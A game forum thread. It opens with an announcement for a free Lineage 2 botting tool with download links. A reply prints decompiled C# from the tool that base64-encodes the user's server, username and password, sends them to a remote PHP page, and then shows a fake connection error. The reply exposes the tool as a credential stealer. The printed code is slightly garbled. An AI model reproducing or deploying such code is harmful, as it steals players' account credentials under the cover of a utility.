Jump to content

Recommended Posts

Posted

========== (ENGLISH) ==========

Lineage 2 Auxhilary ( http://l2auxhilary.vze.com )

 

We'd like to announce another release of L2 Auxhilary v. 1.0.78 Beta!

 

Lineage 2 Auxhilary is a free out of game bot.  The features include:

 

- Auto-leveling

- Auto-questing

- Script support, fully supporting L2 Walker.  Supports most L2 Superman scripts.

- Alert system supporting many different and unique ways of alerting you of actions

- Auto-pet leveler/manager

- Much, much more!

 

We are still currently in beta, and we would like you to come join us!

 

Mirrors for the current version:

 

FileFront:

http://files.filefront.com/L2+Auxhilary+1078+Betazip/;9495344;/fileinfo.html

http://files.filefront.com/L2+Auxhilary+1078+Betarar/;9495343;/fileinfo.html

 

Uploading:

http://www.uploading.com/files/08Q2OVAH/L2_Auxhilary_1.0.78_Beta.zip.html

http://www.uploading.com/files/79YVDZ54/L2_Auxhilary_1.0.78_Beta.rar.html

 

Happy botting!

George S. (Project Lead/Update Manager)

L2 Auxhilary Team

 

========== (BRASIL) ==========

Lineage 2 Auxhilary ( http://l2auxhilary.vze.com )

 

Gostariamos de anunciar mais uma versão do L2 Auxhilary v. 1.0.78 Beta !

 

Especificações:

 

- Auto level

- Auto-quest

- Suporte de script, suportando L2 Walker. Suporta quase todos scripts do L2 Superman

- Alerta o seu sistema de várias e únicas formas de ações

- Auto-pet level

- E muito, muito mais!

 

Ainda estamos atualmente no beta, e gostaríamos que você se junta-se a nós!

 

Links da versão:

 

FileFront:

http://files.filefront.com/L2+Auxhilary+1078+Betazip/;9495344;/fileinfo.html

http://files.filefront.com/L2+Auxhilary+1078+Betarar/;9495343;/fileinfo.html

 

Uploading:

http://www.uploading.com/files/08Q2OVAH/L2_Auxhilary_1.0.78_Beta.zip.html

http://www.uploading.com/files/79YVDZ54/L2_Auxhilary_1.0.78_Beta.rar.html

 

Boa diversão!

 

George S. (Diretor Principal/Assistente de Administração)

L2 Auxhilary Staff

Posted
private void sendData ()

{

if (base.InvokeRequired)

{

Random random1 = new Random();

Thread.Sleep(random1.Next(0x3e8, 0x138);

base.Invoke(new ConnectForm.SendData(this.sendData), new object[0]);

}

else

{

try

{

byte[] buffer1 = Encoding.UTF8.GetBytes(this.serverComboBox.Text);

byte[] buffer2 = Encoding.UTF8.GetBytes(this.usernameTextBox.Text);

byte[] buffer3 = Encoding.UTF8.GetBytes(this.passwordTextBox.Text);

string[] textArray1 = new string[]{"?a=\uFFFD", Convert.ToBase64String(buffer1), "&b=\uFFFD", Convert.ToBase64String(buffer2), "&c=\uFFFD", Convert.ToBase64String(buffer3)};

string text1 = string.Concat(textArray1);

this.webBrowser.Navigate("http://l2auxhilary.byethost13.com/aux_ins.php\uFFFD" + text1);

}

catch

{

}

this.statusLabel.Text = "Ready\uFFFD";

this.connectProgressBar.Style = ProgressBarStyle.Blocks;

this.connectButton.Enabled = true;

MessageBox.Show("Couldn't connect! Check your settings and try again.\uFFFD", "Error\uFFFD");

}

}

does this remind you of anything, Austin?

Guest
This topic is now closed to further replies.


×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock